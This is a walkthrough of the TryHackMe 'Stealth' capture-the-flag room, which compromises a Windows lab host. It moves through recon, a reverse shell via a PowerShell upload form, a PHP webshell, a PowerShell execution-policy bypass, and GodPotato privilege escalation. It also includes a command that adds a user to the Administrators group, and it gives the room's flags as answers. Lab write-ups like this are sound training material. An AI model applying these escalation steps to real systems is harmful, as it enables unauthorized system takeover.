Stealth

Use your evasion skills to pwn a Windows target with an updated defence mechanism. Are you stealthier enough to evade all the updated security measures of the target?

TryHackMe | StealthTryHackMe

Recon

┌──(kali㉿kali)-[~]
└─$ nmap -T4 --min-rate 1000 -sC -sV -p- -Pn stealth.thm            
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-04 03:07 EST
Nmap scan report for stealth.thm (10.10.19.123)
Host is up (0.15s latency).
Not shown: 65525 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: HOSTEVASION
|   NetBIOS_Domain_Name: HOSTEVASION
|   NetBIOS_Computer_Name: HOSTEVASION
|   DNS_Domain_Name: HostEvasion
|   DNS_Computer_Name: HostEvasion
|   Product_Version: 10.0.17763
|_  System_Time: 2024-01-04T08:13:43+00:00
| ssl-cert: Subject: commonName=HostEvasion
| Not valid before: 2024-01-03T07:32:29
|_Not valid after:  2024-07-04T07:32:29
|_ssl-date: 2024-01-04T08:14:23+00:00; 0s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8000/tcp  open  http          PHP cli server 5.5 or later
|_http-title: 404 Not Found
8080/tcp  open  http          Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.0.28)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
|_http-title: PowerShell Script Analyser
8443/tcp  open  ssl/http      Apache httpd 2.4.56 (OpenSSL/1.1.1t PHP/8.0.28)
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
|_http-title: PowerShell Script Analyser
| tls-alpn: 
|_  http/1.1
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: www.example.com; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-01-04T08:13:44
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 430.88 seconds

Upon visiting the page on port 8080 we get a file upload form. It states that it is a PoweShell Script Analyser along with some details on what files we can upload.

Initial Access

Let's try to get a reverse shell with this if possible.

I found this reverse shell scrip to work. Make sure to change the IP address and Port number.

Setup a listener on the specified port.

We have a reverse shell.

We have something callled encodedflag on the desktop. It looks to be base64 encoded. We can decode it and see what it gives us.

┌──(kali㉿kali)-[~]
└─$ echo "WW91IGNhbiBnZXQgdGhlIGZsYWcgYnkgdmlzaXRpbmcgdGhlIGxpbmsgaHR0cDov                                                
LzxJUF9PRl9USElTX1BDPjo4MDAwL2FzZGFzZGFkYXNkamFramRuc2Rmc2Rmcy5w
aHA=" | base64 -d
You can get the flag by visiting the link http://<IP_OF_THIS_PC>:8000/asdasdadasdjakjdnsdfsdfs.php 

Decoding it gives us a link for the flag.

Unfortunately no flag yet. It tells us that there is a log file present. Upon further inspection

SHELL> dir


    Directory: C:\Users\evader\documents\task


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----         9/4/2023   2:13 PM           3114 file.ps1                                                              
-a----        8/29/2023   3:06 PM             71 log.txt                                                               


SHELL> cat file.ps1
$FolderPath = "C:\xampp\htdocs\uploads\"

$FileDictionary = @{}

# Populate the initial state of the dictionary with file names and timestamps
$Files = Get-ChildItem -Path $FolderPath
foreach ($file in $Files) {
    $FileDictionary[$file.Name] = $file.LastWriteTime
}

# Watch for changes in the directory
while ($true) {
.
.
.

                                         # Check if the file is executable, a PowerShell script, or a pdf document
            $extension = $file.Extension.ToLower()
            if ($extension -eq ".ps1") {
                                $scriptPath = "C:\xampp\htdocs\uploads\$($file.Name)"
 .
 .
 .
                                $scriptPath = "C:\xampp\htdocs\uploads\$($file.Name)"


SHELL> dir


    Directory: C:\Users\evader\documents\task


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----         9/4/2023   2:13 PM           3114 file.ps1                                                              
-a----        8/29/2023   3:06 PM             71 log.txt                                                               


SHELL> cat log.txt
File log.txt has been modified.
File vulnerable.ps1 has been modified.
SHELL> 

From the contents of file.ps1located inC:\Users\evader\Documents\Task folder indicates that there is a log file present in the C:\xampp\htdocs\uploads

Remove the log.txt file and accessing the earlier link gives us the first flag.

Privilege Escalation

After some research and trial and error. Payload all the things github led me to another repository with privilege escalation.

GitHub - itm4n/PrivescCheck: Privilege Escalation Enumeration Script for WindowsGitHub

We can use this to check for ways to get privilege escalation. Setup a python server and upload the file.

Following the instructions from the Github

powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"

We can see xampp has high vulnerability and it is run by evader user. Which we have access to via reverse shell.

We can try a simple php webshell and access it via the browser to check for more info.

We have made our shell now we need to access it via the browser.

As you can see this gives us more info.

The user has SeImpersonatePrivilege enabled this can be used to gain privilege escalation. We can use GodPotato for privilege escalation.

GitHub - BeichenDream/GodPotatoGitHub

After uploading the file to C:\xampp\htdocs we use the program's built-in Clsid for privilege escalation and execute a simple command. (Here the output file is potato.exe)

potato.exe+ -cmd "cmd /c whoami"

This shows that we are root (NT AUTHORITY\SYSTEM).

We can just replace the whoami command with dir C:\Users\Administrator\Desktop check for flag on the desktop of the administrator.

We have found a flag here. We can just use type C:\Users\Administrator\Desktop\flag.txt to display the flag.

We can also add the user to the Administrators group and login via RDP and access the flag. This can be done with the following command.

net localgroup administrators <#username#> <#password#> /add

potato.exe+ -cmd "cmd /c net localgroup administrators <#username#> <#password#> /add"

What is the content of the user level flag?
THM{1010_EVASION_LOCAL_USER} 

What is the content of the root level flag?
THM{101011_ADMIN_ACCESS}